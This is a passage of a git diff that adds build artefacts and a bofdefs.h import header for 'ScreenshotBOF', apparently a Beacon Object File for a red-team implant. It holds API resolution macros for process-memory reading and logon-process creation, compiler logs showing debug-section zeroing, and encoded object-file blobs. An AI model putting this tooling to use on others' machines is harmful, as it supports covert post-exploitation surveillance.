dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(); +DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead); +DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); +DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); + + +/* GetLast Error */ +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); + + +/* Directories */ +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath); + + +/* strings */ +DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch); +DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t); +DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...); +DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...); +DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list); +DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR); +DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength); +DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString); +DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); + + +/* RPC */ +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid); + + +/* Random */ +DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial); +DECLSPEC_IMPORT int WINAPI MSVCRT$rand(); + + +/* DateTime */ +DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time); + + +/* SystemInfo */ +DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer); + + + + + + +#ifdef __cplusplus +} +#endif + + +/* helper macros */ + +#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */ +#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */ +#define ZeroMemory(address, size) memset(address, 0, size); + + +/* ----------------------------------- DEFINITIONS ------------------------------------------*/ + +/* COM */ +#define CLSIDFromString OLE32$CLSIDFromString +#define CoCreateInstance OLE32$CoCreateInstance +#define CoInitializeEx OLE32$CoInitializeEx +#define CoUninitialize OLE32$CoUninitialize +#define IIDFromString OLE32$IIDFromString +#define CoInitialize OLE32$CoInitialize +#define CoCreateInstanceEx OLE32$CoCreateInstanceEx +#define SysAllocString OleAut32$SysAllocString +#define VariantInit OLEAUT32$VariantInit +#define CoInitialize OLE32$CoInitialize +#define CoInitializeSecurity OLE32$CoInitializeSecurity + +/* memory */ +#define HeapFree KERNEL32$HeapFree +#define HeapAlloc KERNEL32$HeapAlloc +#define HeapReAlloc KERNEL32$HeapReAlloc +#define memcpy MSVCRT$memcpy +#define memset MSVCRT$memset + + +/* process */ +#define GetProcessHeap KERNEL32$GetProcessHeap +#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW +#define OpenProcess KERNEL32$OpenProcess +#define VirtualQueryEx KERNEL32$VirtualQueryEx +#define GetProcessId KERNEL32$GetProcessId +#define ReadProcessMemory KERNEL32$ReadProcessMemory +#define GetCurrentProcess KERNEL32$GetCurrentProcess +#define Sleep KERNEL32$Sleep +#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW +#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW + + +/* debug */ +#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64 +#define SymInitializeW DBGHELP$SymInitializeW +#define SymCleanup DBGHELP$SymCleanup + + +/* filesystem */ +#define CreateFileA KERNEL32$CreateFileA +#define SetFilePointer KERNEL32$SetFilePointer +#define SetFilePointerEx KERNEL32$SetFilePointerEx +#define WriteFile KERNEL32$WriteFile +#define GetFileSizeEx KERNEL32$GetFileSizeEx +#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW +#define GetFileVersionInfoW VERSION$GetFileVersionInfoW +#define VerQueryValueW VERSION$VerQueryValueW + +/* error */ +#define GetLastError KERNEL32$GetLastError + + +/* registry */ +#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA +#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA +#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA +#define RegSetValueExA ADVAPI32$RegSetValueExA + + +/* directory */ +#define RemoveDirectoryA KERNEL32$RemoveDirectoryA +#define CreateDirectoryA KERNEL32$CreateDirectoryA +#define MoveFileA KERNEL32$MoveFileA +#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA +#define PathFileExistsA SHLWAPI$PathFileExistsA + + +/* strings */ +#define strchr MSVCRT$strchr +#define strcat_s MSVCRT$strcat_s +#define strcpy_s MSVCRT$strcpy_s +#define strncpy_s MSVCRT$strncpy_s +#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */ +#define wcslen MSVCRT$wcslen +#define vsnprintf MSVCRT$vsnprintf +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define strcmp MSVCRT$strcmp +#define lstrcpyA Kernel32$lstrcpyA +#define lstrcatA Kernel32$lstrcatA +#define lstrcpynA Kernel32$lstrcpynA +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define sprintf MSVCRT$sprintf + + +/* RPC */ +#define RpcStringFreeA Rpcrt4$RpcStringFreeA +#define UuidCreate Rpcrt4$UuidCreate +#define UuidToStringA Rpcrt4$UuidToStringA + + +/* Random */ +#define srand MSVCRT$srand +#define rand MSVCRT$rand + + +/* DateTime */ +#define time MSVCRT$time + + +/* SystemInfo */ +#define GetSystemInfo KERNEL32$GetSystemInfo +#define GetUserNameW ADVAPI32$GetUserNameW +#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent + +#else + +#endif diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log new file mode 100644 index 0000000..a901931 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log @@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..4c0ca66ae1d3b0756ea26dea9d35c30a5ed985a7 GIT binary patch literal 622 zcmds!y9&Zk5JaaI{0FgD8?ms9Nqm4BNqoXZ5w);T!3XHit7j7h8^Kxvv%7cZ&Q6lY zeJ)>hIgOMkR17-mP;GhY(+7$)q3cpTCgVMg(M-7+YJj!_XIh^cq|5@1d4-&N+;!+i zYS491IT#;4O!dR8Kn5_jg~I#4M3VD$dCUyP(hBcxpI8VO zn4aNuRdxM!b@T5(f2V%>Gi}p4Ez>a7dfn=MmF`k6&2&6S^R&^?RPQ}~;(RaNtIdP1 z9HxcZj&+WDsN@t<#N;#%i_InZC{s^ZBKIYp%QObbg+0-#Ghq z=jQsAI^#Om>q3v8(@#30ha3I&?72VmVwC%Ilkttyliv3|Sqe#=KhM+-yz!ad-KynU z*RIlerpvPR8w*`E*A=zeROw7@$7(s$^=Ii9QS3ThrC)WwD${|s-1%1bIulLD`n1k? z&UCcW@j&0r)&5iZEnTF~I)cWP9&7#fSZyBl-Mzlu>UgflR9ABU<@2`}>38A$l>W%C zpLLfD-D@jaLyc{wJ--#$wtBzP72DkEGF|GZuY0c5`dnzHdb~~1rOfemo|m zpRqC&bsKCw$?Z7H8FDfeRUJ_-gu5?p^d#>wDm>9HMcIj-yrQ@26RBB#%pOX5=wLMP zY4YLMBQ#l^bsM_461P4|&z4!Qf0W)}h0wZKTXYx4=zeVdN9p6edK2~@>vf8i@Ec!P z=YjfFOJ|?fr>^yUk2OAK`GVeF$l&7a#cROQdEr~iTNrBm!P`1x9c6#(6p8&_+&zwQ z_ky{9vJLyui1E7}rF4*aAO6jr+HR6MkO#IC{g6{PtnKJvW+0F2>ebRFL-|auBbMw4S)7$#2gSMErQaxLC5Y=BZ1R3& zwC%9(xFEKwdV29S^sS@j zxO=9Q6ECTS@zWVpy)ggD=tRamuvbL0w`=DM9TaPWJf+4VaM5f_Y9z*Ph@{1@*gyo}M z+K9^Mj)IpPQE8LwEB!b~WiIu(QRR!>aN;H-GOCTD=Cz6DoiH|@CUbdc6EDrzuFa)V z80`nQM=x5>!=@d21-?iRWfECji0@>;R+0cb2F8&GUBkDcYCY;IoitE)#w03wpd2|K z7y31Hd&>Ov8rwm!k^Fm?=pzs{Yf4IwfUbP4_7&4bA;uy9|6E7q5{(Dy0#2sSQA*<%z zyV@(TkdkA997qcU_~r?zO+1bQT1~zBz|*g zTw!~nHq!}9B}?OiXR6Wf;_*$jPM6h$WG-0W;6WqSIk)o`Zm6)tl?|=>ivFBDb-2fh z_P#YL7q4z1&D2va4jUY6jNEwXmGf|nO__6u9T3>%f|c<;^C2^3_b>CV2xTjPx*kiN zGp42W`Y}ucaq!gD=ie@dc^jEa)mw0ICcRZY_jrt2O%+6WpZFL$R#!#!Na-;U9y=IW zkJi-Yd7z5%MD12>u=={4SHoJP=}Xh8D_i6ssiR??ZE0j}YOz+7%KGw|_b$C|#6uTk zK`(L(UWlllbn<6HC$RFDoGDcQXK^K%6kw&rI@*N z$stjL`6bt3Qk&$#vB;4&`oP75V5G6L3e^Ox_M!H%JiQuJ(2N*k;IP{sA%`4}9Sq(liGDjuFs?ww?lI*hf_ZK->k~bhzio7q2eQ!J%sx9jth@!TeIT19Smz1;aA#i!nik(%b(w;sQ zIpOO%(Fl*DRyA+PmCH^A)GR!RbLHdAh*7$u&O^GJichMrPu)T5+vPEWPGMK7teeW$ z<#lreQT0p|FqSp;s?m#o8t{-Sawrcbz9zn}OLb7J`Pqp&SQMfm2amjocOyn4KUZFg y8cc6RXx=FIl!Vv#4(u&)sLh&nIsAvl|MkCK;{RYGu0NFJkI_G}DZ#^LRQw0r61v#{ literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..80fe074978a23ace5b19924a5f63bddc54eda9ae GIT binary patch literal 498 zcmdsz!3x4K5Cz{^@K-#E2X8Tn7^$YDtyT#3|9_%(5)ixyo~5w6>AWQEyymB@_R1R6 z$tzJaz1K-bS7xWEJ5xh9tO_@}kr~A2Fa=T>V&T5> zj=LhKOz^1V7y28E+>+{dZKy5JS}Uf1`NM$E9&1S#s>5dS{J`1U�ZY)#0a$2tQXB E3nAo7dH?_b literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..574e8b2 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log new file mode 100644 index 0000000..4e915dc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe new file mode 100644 index 0000000..784a6a3 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj new file mode 100644 index 0000000000000000000000000000000000000000..bb9578aa39c2ebefb616337885456f2895070765 GIT binary patch literal 5239 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 literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..6ca20fed7b38cafa74ecf348d4be0cd5884306ae GIT binary patch literal 26542 zcmds=-EJaB5QY0XQr^Lr$&D4SR~v8cFksBW06T!OEfn7WC6b)4%VTCRmR5Lo`@}+q zf$5n!T~%FwUETiopTAQ-{gt+9ot9~sYQ1muxk|UGmu5O1qn?$qX9 zR}RxcZO1xC+rB;r`OHpjxYtm>_jK)6?bhj9M`N|x>P%nfhxz9y9g$7=JS-|qD5R>yO_rn-{*FQ0zBNFRmsL;5qn zf7V?tbg!*w4K=oz_B<=FZJ$4Bb*UFmoa$*~T|dy#wAI@~iY|qQdkyvcOFa`zkD>+r ze|hz{(yIHEvoy*5rkBwZ`Vko6PW*Z<^yfN%B^;lGgzw0BrT6ar&P9Q}jQo5|NIzp` zDC#!YdXn35mNVpJDyll7TnKkx+~`T(V^nyeU5c_3{qc_8s!yb5`7wJa>7j$sz^BQF zUysmab=Ga@;!50lFFjjkz5ZT$gB3#SVr|h~9HaZO_3x#Rcj`^pd#u+fR>E(5VVwu+ zS1p}=TA#Ys^DWl+nB@z4dm)31vuCdXOXr1eDQ{t@@dt0~jCGX#ty3iSM{)N!#@#dK z{>e7%XCub%c9haV=6(1#duqE$>OdaYPV_@g-LST!gPDOmuCp(+QdGd`c*vu?G(X#z zh=|cU#L2F>cGBBE)azQjiKtggn+)YMxsF(}BV=(_dLI<$a+iLioRuK1bFj(#kqWUXx+`mR7iQ=pza4&s z7gs0JBbENb+jg)w`x%SI7xSW6o0olAYVv}2#pNwxxpwBpg?fQ3sPGJi9vvBJFP9V=dk!@t=&j(@G*P!Bz%um#qIpK_|Cg^$d zEPoz6Zs+ivC>Heq*mvf5oRGDpjNAwHa@cxoDHRNX)gv+uuksjTKa^iYNg^yC?b1e6 zK6ezn+=xmW)gyj1lrt)Gsn3lnU+jhxHyM#pZ4@=HO*HR>vGFvS%R`%ZX})%CE|tP) zKe#=5)_NW`?a(XmMS3Wc$l^kLCj+*U1mH0+jy&iZz7#JC_St<_*tpC$5GN8lHZt#I zW!p2oPCBgd@X-2U14>K%OGIw-T0tjPK)K~xk0Eo3B939ZH1RS*@4sc0P23??9kOcf zt*gBP3t4H_1v-sMJTix>8f;K_hm6FT6^-zqSBjY@#Zh&A2v)?R=S#~|7gaykLgF`< z#uc_FYBQa%RI)TKc%~ZtE*{@h>vUO7Nalj|4IVUNopU>H;f4xJT-ng7ujtRoQ-^!3 zXzyF2a`EaG(o8+&;;_N7#>kDAUO5lP*pxYk*a3lEE?61wGaoWjcK0Peg6GonAefHRJ{cUXVP2cbC1WU)l@;0_lb|8V|7(jkCYw*;jx2} z^=M6Po(HNJPt;+Ih1K8zgqc>RR?4UQ=7Moh8sFL*HB-KGsue=8lREn8P zmmCr`m|t=oCUrd?9E%)jqYqp>2u2z^t58kAY9DGJ%hRht1>g8IBADkUvp&%u^S6yo@<0~4dz`hA z7qY(QDcS$mWmYgO%2aEnU91U`)#jgvM73qz15wm=Gbe(k^OADbJp?WfTCub0RNB+0 zA}4%ZCmP{#)T-tUxpLX5fSQGSajtxv88J$C)OkpEQ}Ia^_NhB)eZM?L&?)Rnm3343 zy1Z_VAgZ2;0>-k&UNw60p9VbSiX6(liLZ(8>rx#QYkqd34i<%I$iX9T;@ybR$j_CR zq6X7z5t=v3Jtg5az5{zp9BQ*>T@L?4&EQQ@o=Ot<9H9uvwSJt3T zUWuCNy-qT^GCM`xnHsubRk+cO%*al!mTZ8Ptfjk3CNkwL&wIn(Om5JDDUiw#3-^_G z+!Z-xf=3;{(BD|(mQ=rMLv4B1S~3009|nB(SWCK49X5;S2hQGpM(wn%4nJK)__?}R E03ujRegFUf literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..0f1e4ec --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log new file mode 100644 index 0000000..242f4fc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog 